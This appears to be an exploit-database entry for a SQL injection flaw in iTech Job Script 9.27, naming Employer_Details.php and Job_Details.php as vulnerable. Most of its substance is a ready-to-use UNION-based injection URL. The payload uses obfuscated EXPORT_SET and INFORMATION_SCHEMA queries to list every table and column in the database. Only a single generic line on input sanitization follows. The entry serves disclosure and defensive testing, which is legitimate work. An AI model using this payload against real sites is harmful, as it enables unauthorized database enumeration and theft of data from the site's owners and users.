vendor:
iTech Job Script
by:
Ihsan Sencan
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: iTech Job Script
Affected Version From: 9.27
Affected Version To: 9.27
Patch Exists: N/A
Related CWE: N/A
CPE: a:itechscripts:itech_job_script:9.27
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
iTech Job Script 9.27 – SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/Employer_Details.php?id=[SQL] -3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+- http://localhost/[PATH]/Job_Details.php?id=[SQL]
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.
